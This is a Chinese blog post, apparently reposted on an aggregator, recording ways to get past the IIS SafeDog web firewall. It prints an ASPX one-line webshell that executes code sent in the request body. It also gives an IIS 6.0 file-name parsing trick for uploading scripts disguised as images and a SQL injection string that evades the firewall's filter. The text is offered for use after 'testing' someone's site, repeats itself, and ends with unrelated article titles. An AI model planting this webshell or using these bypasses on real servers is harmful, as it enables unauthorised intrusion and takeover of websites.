突破安全狗的一些记录
来源:互联网 发布:fastjson json转对象 编辑:程序博客网 时间:2024/05/16 11:40
1、绕过IIS安全狗的一句话。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。
2、IIS6.0解析漏洞遇到安全狗。
文件名为http://www.xxxx.com/1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
http://www.xxxx.com/;1.asp;1.jpg
3、安全狗的注入绕过。
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。
2、IIS6.0解析漏洞遇到安全狗。
文件名为http://www.xxxx.com/1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
http://www.xxxx.com/;1.asp;1.jpg
3、安全狗的注入绕过。
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。
- 突破安全狗的一些记录
- 突破安全狗的一些记录
- 突破安全狗的一些记录
- 可突破安全狗的aspx一句话
- 突破安全狗
- 关于线程安全的一些记录
- 突破安全狗上传文件
- 突破CND的一些方法
- 白帽子讲安全 的一些记录点
- 白帽子讲安全 的一些记录点
- 记录一下一些服务器的安全配置(随时更新)
- 安全狗iis 6.0 ; 截断解析突破
- 突破安全狗和360网站卫士
- nginx 的一些优化(突破十万并发)
- Nginx的一些优化(突破十万并发)
- 突破 BTrace 安全限制
- 研究人员突破了Windows RT的安全系统
- 安全的一些经验
- Hadoop 问题总结 常见问题
- 嵌入式系统
- 在你的MFC程序中添加这些代码,可以获得控制台的输入
- java工程如何读取配置文件并获取配置文件中的属性值
- android联系人操作
- 突破安全狗的一些记录
- Linux操作系统分析(1)- How program works
- 自编简单的shell命令解释器要求及代码
- java学习笔记_04_lang包
- 服务器防入侵加固的几种做法
- mybatis高级应用系列一:分页功能
- 【android动画开源库】nineoldandroids
- 设计模式之Proxy模式(C++实现)
- Xss漏洞到底是什么